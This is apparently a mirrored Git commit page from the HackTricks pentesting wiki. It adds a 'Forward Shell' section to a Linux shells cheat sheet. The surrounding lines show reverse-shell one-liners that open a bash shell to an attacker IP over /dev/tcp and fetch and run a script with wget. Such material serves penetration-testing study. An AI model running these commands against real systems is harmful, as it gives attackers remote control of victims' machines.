Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 04:33:28 +00:00
Code Issues Projects Releases Packages Wiki Activity

GitBook: [#3002] No subject

Browse source
This commit is contained in:
CPol 2022-02-09 20:23:12 +00:00 committed by gitbook-bot
parent 23949d07c5
commit 9008bae6b3
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
1 changed files with 13 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

13
shells/shells/linux.md
View file

@ -40,6 +40,19 @@ echo -e '#!/bin/bash\nbash -i >& /dev/tcp/1<ATTACKER-IP>/<PORT> 0>&1' > /tmp/sh.
wget http://<IP attacker>/shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.sh
```
## Forward Shell
You might find cases where you have a **RCE in a web app in a, Linux machine** but due to Iptables rules or other kind of filtering **you cannot get a reverse shell**. This "shell" allows you to maintain a PTY shell through that RCE using pipes inside the victim system.\
You can find the code in [**https://github.com/IppSec/forward-shell**](https://github.com/IppSec/forward-shell)****
You just need to modify:
* The URL of the vulnerable host
* The prefix and suffix of your payload (if any)
* The way the payload is sent (headers? data? extra info?)
Then, you can just **send commands** or even **use the `upgrade` command** to get a full PTY (note that pipes are read and written with an approximate 1.3s delay).
## Netcat
```bash